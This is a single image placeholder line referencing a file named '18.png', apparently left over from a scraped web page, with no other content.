[Image: 18.png?w=687&ssl=1]